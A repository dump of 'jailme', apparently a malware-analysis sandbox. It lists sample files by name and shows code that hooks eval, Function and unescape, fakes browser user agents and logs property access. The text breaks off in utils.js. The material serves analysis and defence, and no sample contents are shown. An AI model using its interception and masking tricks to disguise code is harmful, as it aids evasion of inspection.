├── EXAMPLES.md ├── LICENSE ├── README.md ├── config.json ├── config_wscript_fileexists.json ├── config_wscript_only.json ├── cycle.js ├── env ├── agents.js ├── browser.js ├── console.js ├── eval.js ├── function.js ├── other.js ├── utils.js └── wscript.js ├── jailme.js ├── malware ├── 20160531 │ ├── 8d1c45e37b97fcd061f52a5d7ab73476ab80520df58514eb7e091852d2d43b04.js │ ├── 8d1c45e37b97fcd061f52a5d7ab73476ab80520df58514eb7e091852d2d43b04.output │ ├── 8d1c45e37b97fcd061f52a5d7ab73476ab80520df58514eb7e091852d2d43b04.output.no_download │ ├── README.md │ └── sandbox_dump_after.json ├── 20160929 │ ├── 416e32e1b22ecb8f360ff841b87d77ac9450fda24458ce4e70abb35ff4d242a3.js │ ├── 416e32e1b22ecb8f360ff841b87d77ac9450fda24458ce4e70abb35ff4d242a3.out │ ├── 416e32e1b22ecb8f360ff841b87d77ac9450fda24458ce4e70abb35ff4d242a3.txt │ ├── cb7fc381f6f7600ca0060764ae117482cae3a0fa02db4467604a55c57d069124.js │ └── cb7fc381f6f7600ca0060764ae117482cae3a0fa02db4467604a55c57d069124.out ├── 20161001 │ ├── README.md │ ├── a6dfd6b83d46702c0b408bd5f669e08c785cd12fdd515fe469595e2a3d44ddc4.js │ ├── a6dfd6b83d46702c0b408bd5f669e08c785cd12fdd515fe469595e2a3d44ddc4.out │ ├── cfb2d04891156bffb08ad15188f9dbbd9e7379b0a571fd50128116904873e238.js │ ├── cfb2d04891156bffb08ad15188f9dbbd9e7379b0a571fd50128116904873e238.out │ ├── f51943c5860e548138991b991abecaa175353c80ab3ea91b3d1fbb5a4feb42f4.js │ └── f51943c5860e548138991b991abecaa175353c80ab3ea91b3d1fbb5a4feb42f4.out ├── 20161002 │ ├── ac5705ba4eeb9295b162073cdccf64b9a0a14fd3bf933694e083aab2e65820e9.js │ ├── ac5705ba4eeb9295b162073cdccf64b9a0a14fd3bf933694e083aab2e65820e9.js.orig │ └── ac5705ba4eeb9295b162073cdccf64b9a0a14fd3bf933694e083aab2e65820e9.out ├── 20161003 │ ├── 86943c7e77aac9a3db09def4cdd038f7707fde04d8af59245463dceef5cccc51.js │ └── 86943c7e77aac9a3db09def4cdd038f7707fde04d8af59245463dceef5cccc51.out ├── 20161005 │ ├── dbf6e041cf2431018b977f734db844a2d731dd25cc3debabbfcfa8c529ce2a77.js │ └── dbf6e041cf2431018b977f734db844a2d731dd25cc3debabbfcfa8c529ce2a77.out ├── 20161007 │ ├── 3c1ab04d15fdc84afbf819df546359c8df9a8c303c67c90ce28a4417d9039393.js │ └── 3c1ab04d15fdc84afbf819df546359c8df9a8c303c67c90ce28a4417d9039393.out ├── 20161008 │ ├── 140da02684fd276b6c989317c8ba13f066373dc2623153776da5b8a3e4c7a59f.js │ └── 140da02684fd276b6c989317c8ba13f066373dc2623153776da5b8a3e4c7a59f.out ├── 20161013 │ ├── 802577e503bd1880e57b3bd3d3ed047d90a0f0aa0dee89a04a90944fc1f74f27.js │ ├── 802577e503bd1880e57b3bd3d3ed047d90a0f0aa0dee89a04a90944fc1f74f27.out │ ├── _TMP__XipXkrLd.js │ ├── _TMP__XipXkrLd.js.out │ ├── _TMP__XipXkrLd.out │ └── out │ │ ├── malware_20161013__TMP__XipXkrLd.js │ │ ├── tr_malware_20161013__TMP__XipXkrLd.js │ │ ├── urls.json │ │ └── wmis.json ├── 20161019 │ ├── 7698627e91bd2db3853b9604b710df43deadea9883ae97468a53d20a9601f2d1.js │ └── 7698627e91bd2db3853b9604b710df43deadea9883ae97468a53d20a9601f2d1.out ├── 20161022 │ ├── ece7520d2db75456ebd6f32b01fc79600bbbc2065dbc552bc6077eeaab346771.js │ ├── ece7520d2db75456ebd6f32b01fc79600bbbc2065dbc552bc6077eeaab346771.js.orig │ └── ece7520d2db75456ebd6f32b01fc79600bbbc2065dbc552bc6077eeaab346771.out ├── 20161028 │ ├── 353cfa4952a0199b538c6c389d15816430b422959e60b1becfb87463728eb550.js │ ├── 353cfa4952a0199b538c6c389d15816430b422959e60b1becfb87463728eb550.out │ ├── 7396e78d2ae93b29df342f7bdb67ef4f0b6860fb83ce4b14cc3e23613d636407.js │ ├── 7396e78d2ae93b29df342f7bdb67ef4f0b6860fb83ce4b14cc3e23613d636407.out │ ├── 7b7bd1e2bd63f233004045f8d3c743af41e0107765b703841b620253243a0732.js │ ├── 7b7bd1e2bd63f233004045f8d3c743af41e0107765b703841b620253243a0732.out │ ├── b49b7768b6afada37e9084918e1151a314c29be1728988bcbbc676936f1e7948.js │ ├── b49b7768b6afada37e9084918e1151a314c29be1728988bcbbc676936f1e7948.out │ ├── ddf5e00b01f5841f9ef582e4a9122f549438039ee100088b244c0fa5402a0f5f.js │ └── ddf5e00b01f5841f9ef582e4a9122f549438039ee100088b244c0fa5402a0f5f.out ├── 20161031 │ ├── sample.js │ ├── sample_nocatch.js │ └── sample_stage1.js ├── 20161210 │ ├── 24c314dcfdfbfe984e7ca9e83a96f0aea1ac37cf92eab609f8d4916e6cde299e.js │ └── 24c314dcfdfbfe984e7ca9e83a96f0aea1ac37cf92eab609f8d4916e6cde299e.out ├── 20161213 │ ├── sample.js │ └── sample.out ├── 20161214 │ ├── 5cf27448bf9355692a0448f41f65da625e876e91c66cf6f0a7f7127aed08087b.js │ └── 5cf27448bf9355692a0448f41f65da625e876e91c66cf6f0a7f7127aed08087b.out ├── 20161216 │ ├── README.md │ ├── malware.js │ ├── malware.out_download │ ├── malware.out_file_exists │ ├── malware.out_no_download │ ├── malware2.js │ ├── malware2.out_file_exists │ └── malware2.out_file_exists_trace ├── 20161227 │ ├── 01e4c87434e28a8838cfaf16b121e474512ca176efdcb0bba577fbbb2ddfc8c6.js │ ├── 06e9b62cfa79e8d6cbf2d650dd623c041822eff24e171867c0bf49a4b17d66b2.js │ ├── 18953b45756b4da58948cdc9dc3b4c5af333c4cadd6890bce5bc0fe1395ad63b.js │ ├── 2b2c85e2de6dbd4e1ff02d12018c871984387f6c428a1b515624a1a6b4c5ea00.js │ ├── 84d73512b431365e1650998199fa7673b6fbd290935fcb7a1fbf071359c1ab46.js │ ├── 911bc50c3fcfbd0a1293f5de2b33001d588aa9df4b9a9542880cfca1eaba10cf.js │ ├── 913edfa193769a34805c4b8fcdf8737bce7dc5326e6201217ce61bebc85135e6.js │ ├── 961e7da15919c2d4744bbe161f1db0daa99127e9311c0cfa4c217b7ffa0f33fe.js │ ├── 97d87081f0b8e890df0a1c8ae85332b673329d3f2a74f00f7be3b6cb8ce1fe2c.js │ ├── README.md │ ├── a35738f52720eb875932e65a3831611e6ba7447d40ab90476dff88833243d892.js │ ├── b84e2ced6c7628264e75d2fc5615b3b4a23c18df494618da347d2eebc90ecd80.js │ ├── c0a73d4e21e60a370bbaa476f532a02df17e99e5be3389ff550d28c105d518cd.js │ ├── c0a73d4e21e60a370bbaa476f532a02df17e99e5be3389ff550d28c105d518cd.out │ ├── ca0daa0a2305e3576e2c74c8ad98d115a90642e14377508afaee2096b58bb0ab.js │ └── d0ee77a75a89b7a5ad7cc998526297208454de56f8a403d609d71c7f9ef10f80.js ├── 20170214 │ ├── 459867.3rdstage.bat │ ├── 459867.4thstage.ps1 │ ├── 459867.js │ ├── 459867.output │ ├── 459867.sandbox_dump_after.json │ ├── 459867_2ndstage.base64 │ ├── 459867_2ndstage.js │ ├── 459867_2ndstage.output │ ├── 796423.2ndstage.base64 │ ├── 796423.2ndstage.js │ ├── 796423.2ndstage.output │ ├── 796423.3rdstage.bat │ ├── 796423.4thstage.ps1 │ ├── 796423.js │ ├── 796423.output │ └── 796423.sandbox_dump_after.json ├── 20170216 │ ├── index.html │ └── index.js ├── 20170329 │ └── fatura.js ├── 20170413 │ ├── 170413.js │ └── 170413.out ├── 20170504 │ ├── malware-20170504.1st_run.out │ ├── malware-20170504.js │ └── malware-20170504.out ├── 20170506 │ ├── 1.js │ └── 1.out ├── 20170804 │ └── RLbPRgWrsX.js ├── 20170924 │ ├── decd71ae3b5e683f0c3d057ac0576cbd624ca10734e1984f15cb77fcd23c4a37.js │ ├── decd71ae3b5e683f0c3d057ac0576cbd624ca10734e1984f15cb77fcd23c4a37.out │ └── source.txt ├── 20171004 │ ├── C__Users_User_AppData_Local_Temp_UDqQmLVi2.exe │ ├── Function[14].js │ ├── Function[15].js │ ├── Function[16].js │ ├── Function[17].js │ ├── Function[20].js │ ├── Function[22].js │ ├── eval1.js │ ├── eval2.js │ ├── malware_20171004_pdf.js │ ├── pdf.js │ ├── pdf.js.out │ ├── t404 │ │ ├── Function[14].js │ │ ├── Function[15].js │ │ ├── Function[16].js │ │ ├── Function[17].js │ │ ├── Function[20].js │ │ ├── eval1.js │ │ ├── eval2.js │ │ ├── malware_20171004_pdf.js │ │ ├── pdf.js.out │ │ ├── sandbox_dump_after.json │ │ ├── tr_malware_20171004_pdf.js │ │ └── urls.json │ ├── tr_malware_20171004_pdf.js │ └── urls.json ├── 20171014 │ ├── malware.js │ ├── step1 │ │ └── malware.js.out │ ├── step2 │ │ └── malware.js.out │ └── step3 │ │ └── malware.js.out ├── 20180415 │ ├── DOC2460139368-PDF.js │ └── DOC2460139368-PDF.js.out ├── 20190808 │ ├── C__Users_User_AppData_Local_Temp__TempFile_20.tmp │ ├── jailme-output.txt │ ├── urls.json │ ├── Информация о заказе.2019-0807.docx.js │ └── Информация о заказе.2019-0807.docx.orig.js ├── README.md ├── angler │ ├── angler.js │ ├── angler_full.html │ ├── angler_output.txt │ └── angler_stripped.html ├── example.js └── example_browser.js ├── native_test ├── README.md ├── ado_recordset.js ├── ecma_call_object_as_fn.js └── wmi.js ├── output └── dummy ├── package.json └── test ├── hello-world.js ├── test_env.js └── wscript_test.js /LICENSE: -------------------------------------------------------------------------------- 1 | The MIT License (MIT) 2 | 3 | Copyright (c) 2016 Hynek Petrak 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /config.json: -------------------------------------------------------------------------------- 1 | { 2 | "sandbox_sequence1": [ "env/eval.js", "env/wscript.js" ], 3 | "sandbox_sequence": [ "env/utils.js", "env/eval.js", 4 | "env/function.js", "env/wscript.js", "env/browser.js", 5 | "env/agents.js","env/other.js", "env/console.js" ], 6 | "browser_type" : "IE8", 7 | "malware_files": [], 8 | "context_dump_after": "sandbox_dump_after.json", 9 | "save_files": "output/" 10 | } 11 | -------------------------------------------------------------------------------- /config_wscript_fileexists.json: -------------------------------------------------------------------------------- 1 | { 2 | "sandbox_sequence": [ "env/utils.js", "env/eval.js", 3 | "env/function.js", "env/wscript.js", "env/other.js", 4 | "env/console.js" ], 5 | "malware_files": [], 6 | "context_dump_after": "sandbox_dump_after.json", 7 | "save_files": "output/", 8 | "stack_trace": false, 9 | "options" : { 10 | "FileAlwaysExists" : true 11 | } 12 | } 13 | -------------------------------------------------------------------------------- /config_wscript_only.json: -------------------------------------------------------------------------------- 1 | { 2 | "sandbox_sequence": [ "env/utils.js", "env/eval.js", 3 | "env/function.js", "env/wscript.js", "env/other.js", 4 | "env/console.js" ], 5 | "malware_files": [], 6 | "context_dump_after": "sandbox_dump_after.json", 7 | "save_files": "output/" 8 | } 9 | -------------------------------------------------------------------------------- /cycle.js: -------------------------------------------------------------------------------- 1 | /* 2 | cycle.js https://github.com/douglascrockford/JSON-js 3 | 2015-02-25 4 | 5 | Public Domain. 6 | 7 | NO WARRANTY EXPRESSED OR IMPLIED. USE AT YOUR OWN RISK. 8 | 9 | This code should be minified before deployment. 10 | See http://javascript.crockford.com/jsmin.html 11 | 12 | USE YOUR OWN COPY. IT IS EXTREMELY UNWISE TO LOAD CODE FROM SERVERS YOU DO 13 | NOT CONTROL. 14 | */ 15 | 16 | /*jslint eval, for */ 17 | 18 | /*property 19 | $ref, apply, call, decycle, hasOwnProperty, length, prototype, push, 20 | retrocycle, stringify, test, toString 21 | */ 22 | 23 | if (typeof JSON.decycle !== 'function') { 24 | JSON.decycle = function decycle(object) { 25 | 'use strict'; 26 | 27 | // Make a deep copy of an object or array, assuring that there is at most 28 | // one instance of each object or array in the resulting structure. The 29 | // duplicate references (which might be forming cycles) are replaced with 30 | // an object of the form 31 | // {$ref: PATH} 32 | // where the PATH is a JSONPath string that locates the first occurance. 33 | // So, 34 | // var a = []; 35 | // a[0] = a; 36 | // return JSON.stringify(JSON.decycle(a)); 37 | // produces the string '[{"$ref":"$"}]'. 38 | 39 | // JSONPath is used to locate the unique object. $ indicates the top level of 40 | // the object or array. [NUMBER] or [STRING] indicates a child member or 41 | // property. 42 | 43 | var objects = [], // Keep a reference to each unique object or array 44 | paths = []; // Keep the path to each unique object or array 45 | 46 | return (function derez(value, path) { 47 | 48 | // The derez recurses through the object, producing the deep copy. 49 | 50 | var i, // The loop counter 51 | name, // Property name 52 | nu; // The new object or array 53 | 54 | // typeof null === 'object', so go on if this value is really an object but not 55 | // one of the weird builtin objects. 56 | 57 | if (typeof value === 'object' && value !== null && 58 | !(value instanceof Boolean) && 59 | !(value instanceof Date) && 60 | !(value instanceof Number) && 61 | !(value instanceof RegExp) && 62 | !(value instanceof String)) { 63 | 64 | // If the value is an object or array, look to see if we have already 65 | // encountered it. If so, return a $ref/path object. This is a hard way, 66 | // linear search that will get slower as the number of unique objects grows. 67 | 68 | for (i = 0; i < objects.length; i += 1) { 69 | if (objects[i] === value) { 70 | return { $ref: paths[i] }; 71 | } 72 | } 73 | 74 | // Otherwise, accumulate the unique value and its path. 75 | 76 | objects.push(value); 77 | paths.push(path); 78 | 79 | // If it is an array, replicate the array. 80 | 81 | if (Object.prototype.toString.apply(value) === '[object Array]') { 82 | nu = []; 83 | for (i = 0; i < value.length; i += 1) { 84 | nu[i] = derez(value[i], path + '[' + i + ']'); 85 | } 86 | } else { 87 | 88 | // If it is an object, replicate the object. 89 | 90 | nu = {}; 91 | for (name in value) { 92 | if (Object.prototype.hasOwnProperty.call(value, name)) { 93 | nu[name] = derez(value[name], 94 | path + '[' + JSON.stringify(name) + ']'); 95 | } 96 | } 97 | } 98 | return nu; 99 | } 100 | return value; 101 | }(object, '$')); 102 | }; 103 | } 104 | 105 | 106 | if (typeof JSON.retrocycle !== 'function') { 107 | JSON.retrocycle = function retrocycle($) { 108 | 'use strict'; 109 | 110 | // Restore an object that was reduced by decycle. Members whose values are 111 | // objects of the form 112 | // {$ref: PATH} 113 | // are replaced with references to the value found by the PATH. This will 114 | // restore cycles. The object will be mutated. 115 | 116 | // The eval function is used to locate the values described by a PATH. The 117 | // root object is kept in a $ variable. A regular expression is used to 118 | // assure that the PATH is extremely well formed. The regexp contains nested 119 | // * quantifiers. That has been known to have extremely bad performance 120 | // problems on some browsers for very long strings. A PATH is expected to be 121 | // reasonably short. A PATH is allowed to belong to a very restricted subset of 122 | // Goessner's JSONPath. 123 | 124 | // So, 125 | // var s = '[{"$ref":"$"}]'; 126 | // return JSON.retrocycle(JSON.parse(s)); 127 | // produces an array containing a single element which is the array itself. 128 | 129 | var px = /^\$(?:\[(?:\d+|\"(?:[^\\\"\u0000-\u001f]|\\([\\\"\/bfnrt]|u[0-9a-zA-Z]{4}))*\")\])*$/; 130 | 131 | (function rez(value) { 132 | 133 | // The rez function walks recursively through the object looking for $ref 134 | // properties. When it finds one that has a value that is a path, then it 135 | // replaces the $ref object with a reference to the value that is found by 136 | // the path. 137 | 138 | var i, item, name, path; 139 | 140 | if (value && typeof value === 'object') { 141 | if (Object.prototype.toString.apply(value) === '[object Array]') { 142 | for (i = 0; i < value.length; i += 1) { 143 | item = value[i]; 144 | if (item && typeof item === 'object') { 145 | path = item.$ref; 146 | if (typeof path === 'string' && px.test(path)) { 147 | value[i] = eval(path); 148 | } else { 149 | rez(item); 150 | } 151 | } 152 | } 153 | } else { 154 | for (name in value) { 155 | if (typeof value[name] === 'object') { 156 | item = value[name]; 157 | if (item) { 158 | path = item.$ref; 159 | if (typeof path === 'string' && px.test(path)) { 160 | value[name] = eval(path); 161 | } else { 162 | rez(item); 163 | } 164 | } 165 | } 166 | } 167 | } 168 | } 169 | }($)); 170 | return $; 171 | }; 172 | } -------------------------------------------------------------------------------- /env/agents.js: -------------------------------------------------------------------------------- 1 | /* 2 | agents.js - different browser agent strings 3 | */ 4 | 5 | _agents = { 6 | "IE11_W10": { 7 | "_browser_type": "IE11 on Win10 64bit", 8 | "userAgent": 9 | //"Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko", 10 | "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; rv:11.0) like Gecko", 11 | "chrome": undefined, 12 | "vendor": "" 13 | }, 14 | "IE8": { 15 | "_browser_type": "IE8 on Win10 64bit", 16 | "userAgent": 17 | //"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; .NET CLR 2.7.58687; SLCC2; Media Center PC 5.0; Zune 3.4; Tablet PC 3.6; InfoPath.3)", 18 | "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; WOW64; Trident/7.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", 19 | "chrome": undefined, 20 | "vendor": undefined 21 | }, 22 | "IE7": { 23 | "_browser_type": "IE7 on Vista", 24 | "userAgent": 25 | //"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; .NET CLR 2.7.58687; SLCC2; Media Center PC 5.0; Zune 3.4; Tablet PC 3.6; InfoPath.3)", 26 | "Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 6.0; en-US)", 27 | "chrome": undefined, 28 | "vendor": undefined 29 | }, 30 | "iPhone": { 31 | "_browser_type": "iPhone?", 32 | "userAgent": "Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/47.0.2526.70 Mobile/12B436 Safari/600.1.4 (000410)", 33 | "chrome": undefined, 34 | "vendor": "Apple" 35 | }, 36 | "Firefox": { 37 | "_browser_type": "Firefox on Win10 64bit", 38 | "userAgent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0", 39 | "chrome": undefined, 40 | "vendor": "" 41 | }, 42 | "Chrome": { 43 | "_browser_type": "Chrome on Win10 64bit", 44 | "userAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36", 45 | "chrome": { 46 | "app": {}, 47 | "csi": function() {}, 48 | "loadTimes": function() {}, 49 | "runtime": {}, 50 | "webstore": {} 51 | }, 52 | "vendor": "Google Inc." 53 | } 54 | } 55 | 56 | if (typeof exports !== 'undefined') 57 | exports._agents = _agents; 58 | 59 | if (typeof window !== 'undefined' /*&& typeof window._props !== 'undefined'*/) { 60 | window._props = _agents[_browser_type]; 61 | util_log("Setting Browser environment to:", window._props._browser_type); 62 | for (var k in window._props) { 63 | _defineProperty(window, k, window._props); 64 | } 65 | window.appVersion = window.userAgent; 66 | } 67 | -------------------------------------------------------------------------------- /env/console.js: -------------------------------------------------------------------------------- 1 | console = _proxy({ 2 | _name: "console", 3 | time: function(a) { 4 | util_log(this._name + ".time(" + a + ")"); 5 | return; 6 | }, 7 | timeend: function(a) { 8 | util_log(this._name + ".timeEnd(" + a + ")"); 9 | return; 10 | }, 11 | log: function(a) { 12 | util_log(this._name + ".log(" + a + ")"); 13 | return; 14 | }, 15 | assert: function(a) { 16 | util_log(this._name + ".assert(" + a + ")"); 17 | return; 18 | }, 19 | clear: function(a) { 20 | util_log(this._name + ".clear" + a + ")"); 21 | return; 22 | }, 23 | count: function(a) { 24 | util_log(this._name + ".count(" + a + ")"); 25 | return; 26 | }, 27 | dir: function(a) { 28 | util_log(this._name + ".dir(" + a + ")"); 29 | return; 30 | }, 31 | dirxml: function(a) { 32 | util_log(this._name + ".dirxml(" + a + ")"); 33 | return; 34 | }, 35 | error: function(a) { 36 | util_log(this._name + ".(" + a + ")"); 37 | return; 38 | }, 39 | group: function(a) { 40 | util_log(this._name + ".group(" + a + ")"); 41 | return; 42 | }, 43 | groupcollapsed: function(a) { 44 | util_log(this._name + ".groupCollapsed(" + a + ")"); 45 | return; 46 | }, 47 | groupend: function(a) { 48 | util_log(this._name + ".groupEnd(" + a + ")"); 49 | return; 50 | }, 51 | info: function(a) { 52 | util_log(this._name + ".info(" + a + ")"); 53 | return; 54 | }, 55 | profile: function(a) { 56 | util_log(this._name + ".profile(" + a + ")"); 57 | return; 58 | }, 59 | profileend: function(a) { 60 | util_log(this._name + ".profileEnd(" + a + ")"); 61 | return; 62 | }, 63 | table: function(a) { 64 | util_log(this._name + ".table(" + a + ")"); 65 | return; 66 | }, 67 | timestamp: function(a) { 68 | util_log(this._name + ".timeStamp(" + a + ")"); 69 | return; 70 | }, 71 | trace: function(a) { 72 | util_log(this._name + ".trace(" + a + ")"); 73 | return; 74 | }, 75 | warn: function(a) { 76 | util_log(this._name + ".warn(" + a + ")"); 77 | return; 78 | } 79 | }) 80 | console.toString = () => { return "console" } 81 | -------------------------------------------------------------------------------- /env/eval.js: -------------------------------------------------------------------------------- 1 | util_log("Preparing sandbox to intercept eval() calls."); 2 | eval = function() { 3 | var _eval_calls = []; 4 | _data["eval_calls"] = _eval_calls; 5 | var _orig_eval; 6 | if (typeof _orig_eval === 'undefined') 7 | _orig_eval = eval; 8 | var _ = function(s) { 9 | var _t = {}; 10 | _t["orig"] = s; 11 | var ns; 12 | //if (s.indexOf("continue") > -1) { 13 | // util_log("Potentially contains continue within a catch"); 14 | // ns = s.replace(/try/g, '').replace(/catch/g, '\r\nwhile'); 15 | //} else { 16 | // ns = s.replace(/try/g, '').replace(/catch/g, '\r\nfunction _mycatch'); 17 | //} 18 | //_t["no_try_catch"] = ns; 19 | ns1 = s.replace(/\bcatch\b\s*\((.*?)\)\s*{/g, 'catch($1) { util_log(">>> Silencing catch " + _inspect($1));'); 20 | _t["report_catch"] = ns1; 21 | // https://github.com/defconhaya proposal: 22 | ns = ns1.replace(/function ([^ (]*)/g, "$1 = function"); 23 | //ns1 = ns; 24 | _t["safe_funcs"] = ns; 25 | _eval_calls[_eval_calls.length] = _t; 26 | var _isStrict = (function() { 27 | return !this; 28 | })(); 29 | 30 | ns1 = ns1.replace(/\/\*@cc_on/gi, ""); 31 | ns1 = ns1.replace(/@\*\//gi, ""); 32 | ns1 = ns1.replace(/@if.*/gi, ""); 33 | ns1 = ns1.replace(/@else.*/gi, ""); 34 | ns1 = ns1.replace(/@elif.*/gi, ""); 35 | ns1 = ns1.replace(/@end.*/gi, ""); 36 | 37 | ns1 = ns1.replace(/\} *var\b/g, "}; var"); 38 | 39 | //util_log("Strict mode:", _isStrict); 40 | util_log("Calling eval[" + _eval_calls.length + "]('" + _truncateOutput(ns1) +"')"); 41 | return _orig_eval(ns1); 42 | } 43 | return function eval(s) { /* [native code ] */ return _(s)} 44 | }(); 45 | -------------------------------------------------------------------------------- /env/function.js: -------------------------------------------------------------------------------- 1 | util_log("Preparing sandbox to intercept 'new Function()' calls."); 2 | _Function_calls = {}; 3 | 4 | var Function = function() { 5 | _orig_Function = Function; 6 | _orig_Function.toString = () => { 7 | return "_orig_Function"; 8 | } 9 | return function() { 10 | _fn_id = _object_id++; 11 | _name = "Function[" + _fn_id + "]"; 12 | _Function_calls[_name] = Array.prototype.slice.call(arguments); //.join(","); 13 | util_log("new Function(" + _truncateOutput(Array.prototype.slice.call(arguments).join(", ")) + ") => " + _name); 14 | // Inject logger into the new function created 15 | var new_args = arguments; 16 | var orig_body = arguments[new_args.length - 1]; 17 | //util_log("orig: " + orig_body); 18 | var orig_fn = "function(" + Array.prototype.slice.call(arguments, 0, -1).join(", ") + ") {" + orig_body + "}" 19 | var used_body = "var fn = " + orig_fn + "; var __my_ret = fn.apply(this, arguments); util_log(\"Returning: '\"+__my_ret+\"'\"); return __my_ret;"; 20 | //var escaped_fn = orig_fn.replace(/\"/g, "\\\""); 21 | used_body = "util_log('Calling Function[" + _fn_id + 22 | "]('+_truncateOutput(Array.prototype.slice.call(arguments).join(\", \"))+') on ' + _truncateOutput(this));" + used_body; 23 | new_args[new_args.length - 1] = used_body; 24 | //util_log("args: " + Array.prototype.slice.call(new_args).join(",")); 25 | return _orig_Function.apply(this, new_args); 26 | }; 27 | }() 28 | 29 | Function.toString = () => { 30 | return "Function" 31 | } 32 | -------------------------------------------------------------------------------- /env/other.js: -------------------------------------------------------------------------------- 1 | _unescape_calls = []; 2 | _unescape_retuns = []; 3 | if (typeof _orig_unescape === 'undefined') { 4 | _orig_unescape = unescape; 5 | _orig_unescape.toString = () => { return "_orig_unescape" } 6 | } 7 | unescape = function(s) { 8 | _unescape_calls[_unescape_calls.length] = s; 9 | util_log("Calling unescape() no.:", _unescape_calls.length); 10 | var _r = _orig_unescape(s); 11 | _unescape_retuns[_unescape_calls.length-1] = _r; 12 | return _r; 13 | } 14 | unescape.toString = () => { return "unescape" } 15 | 16 | -------------------------------------------------------------------------------- /env/utils.js: -------------------------------------------------------------------------------- 1 | function _trace(t) { 2 | try { 3 | throw new Error(t); 4 | } catch (err) { 5 | util_log("Trace Non-" + _inspect(err)); 6 | } 7 | } 8 | 9 | var _defineProperty = function(that, name, map) { 10 | Object.defineProperty(that, name, { 11 | get: function() { 12 | util_log(that._name + "." + name + ".get() => " + _truncateOutput(map[name])); 13 | return map[name]; 14 | }, 15 | set: function(v) { 16 | util_log(that._name + "." + name + " = '" + _truncateOutput(v) + "'"); 17 | map[name] = v; 18 | } 19 | }) 20 | } 21 | _defineProperty.toString = () => { 22 | return "_defineProperty" 23 | } 24 | 25 | var _truncateOutput = function(v, max_len) { 26 | // TODO: make max_len a command line parameter 27 | try { 28 | if (typeof max_len === 'undefined') { 29 | max_len = 250; 30 | } 31 | if (v === null) 32 | return "null"; 33 | if (typeof v === 'undefined') 34 | return "undefined"; 35 | var vtrunc = "" + v.toString(); 36 | if (vtrunc.length > max_len) { 37 | vtrunc = vtrunc.substring(0, max_len) + " ... (truncated)"; 38 | } 39 | return vtrunc.replace(/[^\x20-\x7E]/g, '?'); 40 | } catch (err) { 41 | util_log("Exception occured in _truncateOutput: " + _inspect(err)); 42 | throw err; 43 | } 44 | } 45 | _truncateOutput.toString = () => { 46 | return "_truncateOutput" 47 | } 48 | 49 | var _defineSingleProperty = function(that, name, intvar) { 50 | if (typeof intvar === 'undefined') { 51 | intvar = "_" + name; 52 | that[intvar] = ""; 53 | } 54 | 55 | Object.defineProperty(that, name, { 56 | get: function() { 57 | util_log(that._name + "." + name + ".get() => (" + typeof that[intvar] + ") '" + _truncateOutput(that[intvar]) + "'"); 58 | return that[intvar]; 59 | }, 60 | set: function(v) { 61 | util_log(that._name + "." + name + " = (" + typeof v + ") '" + _truncateOutput(v) + "'"); 62 | that[intvar] = v; 63 | } 64 | }) 65 | } 66 | _defineSingleProperty.toString = () => { 67 | return "_defineSingleProperty" 68 | } 69 | var _proxy_verbose = false; 70 | var _proxy_options = { 71 | "dont_fail": true, 72 | "verbose" : false 73 | }; 74 | 75 | 76 | var _proxy = function(o, verbose = false, what = undefined) { 77 | // util_log("Creating proxy for " + o); 78 | ret = new Proxy(o, { 79 | get: function(target, name) { 80 | //util_log("name is a " + typeof name); 81 | if (_proxy_options.verbose || verbose) { 82 | if (typeof name === 'symbol') 83 | vname = name.toString(); 84 | else 85 | vname = name; 86 | if (what) { 87 | var msg = what + "[" + vname + "]"; 88 | } else { 89 | var msg = "Proxy.get: " + _truncateOutput(target.toString(), 50) + "[" + vname + "]"; 90 | } 91 | } 92 | if (name in target) { 93 | if (msg) 94 | util_log(msg + " => " + Reflect.get(target, name)); 95 | return Reflect.get(target, name); 96 | } 97 | if (typeof name === 'string') { 98 | lcname = name.toLowerCase(); 99 | if (lcname in target) { 100 | if (msg) 101 | util_log(msg + " => " + Reflect.get(target, name)); 102 | return Reflect.get(target, lcname); 103 | } 104 | } 105 | ret = Reflect.get(target, name); 106 | if (typeof name !== 'symbol') { 107 | vname = name.toString(); 108 | if (typeof ret === 'undefined') { 109 | if (_proxy_options.dont_fail) 110 | util_log(">>> FIXME: " + target._name + "[" + vname + "] not defined"); 111 | else 112 | throw new TypeError(">>> FIXME: " + target + "[" + vname + "] not defined"); 113 | } else { 114 | util_log(">>> FIXME: " + target._name + "[" + vname + "] reflected to " + typeof ret); 115 | } 116 | } 117 | 118 | return ret; 119 | }, 120 | set: function(target, name, value) { 121 | if (_proxy_options.verbose) { 122 | if (typeof name === 'symbol') 123 | vname = name.toString(); 124 | else 